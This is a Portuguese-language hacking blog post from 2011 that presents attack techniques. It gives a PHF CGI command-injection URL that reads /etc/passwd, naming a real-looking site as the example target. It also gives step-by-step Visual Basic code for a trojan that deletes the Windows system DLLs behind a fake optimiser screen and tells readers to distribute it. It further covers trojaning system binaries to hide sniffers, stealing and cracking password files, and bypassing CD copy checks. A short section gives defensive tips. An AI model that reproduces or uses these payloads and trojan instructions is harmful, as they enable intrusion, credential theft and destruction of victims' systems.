29 de abr. de 2011

Técnicas Hacker


ATENÇÃO: Todo o conteúdo contido nesta pagina,foi meramente encontrado na Internet, eu não me responsabilizo pelo mau uso dessas informações !


Ataque a provedores via browser


O ataque via browser é um dos ataques mais fáceis de executar, mas não dá nem 50% de sucessos nos ataques. Vou tentar explicar como você usa esse metudo:
Primeiramente você tem que entender o que está fazendo, não adianta seleccionar a dica aperta CTRL+C e colocar no navegador achando que ele vai fazer tudo para você não, entenda:
Bom, como já sabe o geralmente o arquivo "passwd" é o que contém os passwords encripitados


(se você nao sabe ainda, dá um olhada na seção "SISTEMA UNIX"), existem vários servidores que só Root pode entrar no diretório "/etc", para outros usuarios é bloqueado o acesso a esse diretório, mas existe um método para tentar pegar esse arquivo. No diretório /cgi-bin do Web Server (Pagina WEB do servidor) geralmente contém um arquivos chamdo PHF. O PHF permite aos usuários ganhar acesso remoto para arquivos (inclusive o /etc/passwd). Então através desse arquivo você pode tentar pegar a lista de passwords, é muito simples, apenas digite essa URL no seu browser:


http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Então substitua o "xxx.xxx.xxx" pelo endereço do servidor que você quer hackear.


Ex:
http://www.tba.com.br/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Bom, mas se você usar um pouco a cabeça vai ver que para que não de nada errado e você pode usar o anonymizer (Se você não ainda o que é o anonymizer, dá uma olhada na seção Anônimo), bom não é certeza que dá pra usar não porque eu nunca tentei, mas pela lógica dá.


Ataques por monitoração


Os ataques por monitoração são baseados em software de monitoração de rede conhecido como "sniffer", instalado surrepticiamente pelos invasores.
O sniffer grava os primeiros 128 bytes de cada sessão login, telnet e FTP session vista naquele segmento de rede local, comprometendo TODO o tráfego de/para qualquer máquina naquele segmento, bem como o tráfego que passar por aquele segmento. Os dados capturados incluem o nome do host destino, o username e a password. A informação é gravada num arquivo posteriormente recuperado pelo invasor para ter acesso a outras máquinas.
Em muitos casos os invasores obtem acesso inicial aos sistemas usando uma das seguintes técnicas:

Obtém o arquivo de passwords via FTP em sistemas impropriamente configurados.

Obtém o arquivo de password de sistemas rodando versões inseguras do NIS
Obtém acesso ao sistema de arquivos locais via pontos exportados para montagem com NFS, sem restrições. Usam um nome de login e password capturada por um sniffer rodando em outro sistema.

Uma vez no sistema, os invasores obtem privilegios de root explorando vulnerabilidades conhecidas, tal como rdist, Sun Sparc integer division, e arquivos utmp passíveis de escrita por todo mundo ou usando uma password de root capturada.
Eles então instalam o software sniffer, registrando a informação capturada num arquivo invisível. Adicionalemente, eles instalam Cavalos de Troia em substituição e uma ou mais dentre os seguintes arquivos do sistema, para ocultar sua presença:


/bin/login
/usr/etc/in.telnetd
/usr/kvm/ps
/usr/ucb/netstat


Cavalos de Tróia


1. Saiba o que são os cavalos de Tróia
Cavalos de Tróia são programas que vem escondidos dentro de outros sem que o usuário saiba de sua existência. Eles podem permitir que outra pessoa obtenha controle sobre a máquina de um internauta conectado à Internet.

Atualmente, o recursos tem sido amplamente utilizado para invadir máquinas conectadas à Internet. A tática é simples: mandar um programa qualquer (protetores de tela ou animações engraçadinhas, por exemplo), que na verdade contém inserido um outro que dá ao hacker acesso remoto à máquina onde o cavalo de Tróia foi instalado. Esses softwares são verdadeiras portas de acesso ao conteúdo do computador.

Os Cavalos de Tróia permitem que outra pessoa obtenha controle sobre a máquina do usuário, através do protocolo TCP/IP da Internet. Testes demonstraram que o administrador remoto é capaz de acessar dados e efetuar tarefas com mais eficiência do que o próprio usuário que está em frente à máquina.


2. Conheça os programas Back Orifice, Netbus, Sockets de Tróie e outros
Entre os principais troianos estão o Back Orifice (BO), que se instala em micros que rodam o Windows 95/98, o NetBus, capaz de rodar também no Windows NT, o Master's Paradise 98 e o Sockets de Troie (ST). Todos apresentam características semelhantes: permitem administração remota, revelam as senhas contidas no sistema operacional do usuário e mostram em tempo real tudo aquilo que é digitado.


3. Dicas para evitar a invasão de seu micro
- Proteja e troque a sua senha
O controle deve começar pela identidade digital do usuário. User e senha são identificações particulares que merecem o máximo cuidado e sigilo. Com certeza, ninguém gostaria de compartilhar a sua senha bancária ou o número do seu cartão de crédito com mais alguém. O mesmo deve acontecer com a sua senha de acesso.

A troca periódica da senha é um bom começo para quem não quer dar chance ao azar. A maioria dos provedores de acesso oferece esse serviço online. Para maior segurança, o usuário deve utilizar senhas relativamente complexas. No mínimo, utilize uma senha alfanumérica com 6 caracteres. Mantenha o hábito de conferir o extrato detalhado da utilização da sua conta de acesso. Ao notar qualquer alteração no número de horas utilizadas, entre em contato com administração do seu provedor.

Isso evita alguns problemas, mas não funciona se o seu computador já tiver um cavalo de Tróia instalado. Isso porque alguns desses programas permitem ao hacker roubar a sua senha do seu próprio micro. Nesse caso, é necessário desinstalar o troiano de sua máquina, antes de mais nada. Para saber se há algum cavalo de Tróia instalado em sua máquina, você precisa de um programa detector.


- Não execute programas de origem duvidosa
Antes de mais nada, para evitar que a sua máquina seja vítima de um ataque deste tipo, recomendamos que você pense duas vezes entes de rodar qualquer arquivo executável (qq_coisa.exe) encontrado na rede ou recebido por e-mail. Mesmo que você receba um executável de um conhecido ou amigo, procure saber antes a procedência do mesmo.
- Seja cauteloso com o IRC e ICQ


Muitos dos programas de IRC tem bugs conhecidos que permitem aos usuarios enviar executáveis para outros, em certas circunstâncias. Não aceite programas (jogos, screensavers etc.) recebidos via IRC porque não há como saber quem o está enviando, e também nunca se deve deixar o IRC aceitando automaticamente transmissões de arquivos ou executando scripts. As mesmas precauções valem para o ICQ. Não acredite em noticias recebidas ao acaso dizendo coisas como "use este programa para atualizar seu ICQ" ou "rode este patch para proteger seu Explorer" etc. Se receber algo assim, confira sempre as notícias no site do fabricante do software em questão.


- Atualize o seu navegador periodicamente
Além da troca de senha, o usuário precisa manter seus softwares sempre atualizados. Tanto o navegador da Netscape quanto o da Microsoft (Internet Explorer) já apresentaram bugs de segurança em quase todas as suas versões. Tão logo estes bugs são descobertos, as respectivas fabricantes oferecem patches de correção para os problemas. Visitas regulares ao site da fabricante do seu navegador preferido o ajudarão na coleta de informações sobre os bugs e suas respectivas correções.


4. Copie programas para se defender
Para evitar que a sua máquina seja vítima do ataque de um hacker utilize um Firewall,


Os Trojans, ou Cavalos-de-Tróia: são as coisas mais comuns hoje em dia na Internet. Não passam de programas que passam por algo extraordinário, mas na verdade são malignos. Ou seja, pode passar-se por um belo jogo e formatar teu HD. Aqui, eu vou ensinar a fazer uns Trojans. Mensalmente, espero, vou por um ou mais Trojans novos. Como 99% das pessoas usam Windows 95, vou colocar com o código para Visual Basic. Não é uma admiração pela Microsoft, muito pelo contrário, mas seria inútil programar em C para rodar em Windows.
Cavalo de Tróia 1


Para este Trojan, você vai utilizar apenas um botão, alguns labels e dependendo de você algumas figuras.
Este é um simples Trojan. Simplesmente deleta as DLL's do diretório System do Windows.
Faça uma tela convincente, dizendo que é um belo programa que otimiza a velocidade do micro, melhora o desempenho da conexão à Internet, sei lá... Qualquer coisa. Faça uma bela tela, se possível coloque uns logotipos qualquer para impressionar. Então ponha um botão, escrito "Continuar". No seu código coloque:


Evento - Click (Isso é o que aparece no lado superior direito da tela. Aquele dropdown)
kill "c:\windows\system\*.dll"
form2.show


Crie um novo formulário, simplesmente com a frase: "Aguarde enquanto o Setup copia os arquivos necessários para a instalação" Não mexa no nome dele, ou você terá que mudar a linha form2.show para .show.Aí, isso é importante, crie o setup do programa com o Setup Wizard. Assim ele copiará todas as DLL's necessárias para que o programa funcione. Com o setup feito, compacte em zip ou arj, e coloque em alguma BBS ou distribua. Quem pegar terá uma grande surpresa.


Descobrindo senhas


Se você está afim de pegar senhas para o seu uso, leia atentamente as instruções abaixo:
1. O jeito mais facil de pegar senhas, é fazendo o download do arquivo passwd, que fica no diretorio /etc do provedor. Neste arquivo, estão armazenado os logins, senhas cryptografadas e outros dados de todos os 'users' daquele provedor. Na maioria dos lugares o arquivo passwd contido no diretorio /etc, vem com um chamado shadow.
O que seria shadow?


Shadow, é quando o arquivo passwd nao vem com as senhas cryptografadas. Ele vem com um * no lugar da senha. Abaixo você tem um exemplo de um passwd com shadow.
kaneko:*:118:100:Take7:TaniKayoko:/home/students/makizono/s974076:/bin/csh
E com esse shadow, não da pra você descryptografar as senhas. Mais existe um jeito de tirar esse shadow! Basta voce usar o programa "unshad.c". Se o arquivo passwd estiver sem shadow, não será necessário a utilizacao desse programa.
Abaixo, um exemplo de um passwd sem shadow.


galvao:r2ln6GlgXEIVg:2201:2001:Geraldo P. Galvao:/home/galvao:/bin/csh
No exemplo mostrado, a senha cryptografada é "r2ln6GlgXEIVg"


2.Descryptografando as senhas
Bom, já falamos da parte de download do passwd agora, vamos falar de como se descryptografa as senhas. Para descryptografar as senhas, você precisara de um cracker (Programa usado para descryptografar senhas)
Ex.: CrackJack


3.Como usar o programa unshad.c
Usar o programa unshad.c, é muito fácil. Basta você fazer um upload dele pra sua shell, e quando ele ja estiver na shell, digite "cc -o unshad unshad.c" para compila-lo. Após a compilacao, basta digitar "./unshad" e as shells se abriram sem o shadow.
Se você usa o Windows 95 como sistema operacional, jogue ele fora e pegue o LINUX. Se você não usar o LINUX não será um verdadeiro Hacker.


Enganando programas


Sabe akeles programas ou jogos que precisam do CD para rodarem? Claro que sabe, porque eu perguntei. Aqui vou ensinar como fazer o programa acredi- tar que o CD estah no drive.Aqui vao algumas manhas:


1. Veja se existe um config.cfg em algum diretorio do jogo jah instalado no HD. Se existir abra-o e procure por uma linha tipo: CD-ROM DRIVE: D: Entao mudea para: CD-ROM DRIVE: C:\JOGOS\SIMCITY\


2. Copie a parte do CD que e' usada pelo jogo para o um diretorio do HD. Entao resete o computador sem carregar o MSCDEX para o DOS nao reconhecer a unidade de CD-ROM(ele estah no autoexec.bat e config.sys). Entao entre no DOS e digite: subst D: C:\JOGOS\SIMCITY\Essa dica soh funcionara' se o jogo for para DOS.


3. Depois de instalar o Jogo, rode um programa que particione o HD, assim a particao fica com o nome de D: e o jogo se confunde. Copie o conteudo do jogo do CD para essa particao.


4. Rode um editor hexadecimal no jogo e procure a palavra 'D:', altere tudo, inclusive os dirs para a unidade local(C:) e salve. Agora copie os diretorios que serao carregados pelo jogo, para o HD(na Raiz).


5. Rode um editor hexadecimal no jogo e procure pelo hexa 'CD 2F'(int 2F). Para quem nao sabe essa e' a interrupcao do CD. Esse meio é difício porque voce deve conhecer um pouco de assembly e um pouco dos codigos hexadecimais para alterar as instrucoes dessa instrução.



Nenhum comentário:

Postar um comentário

Dowload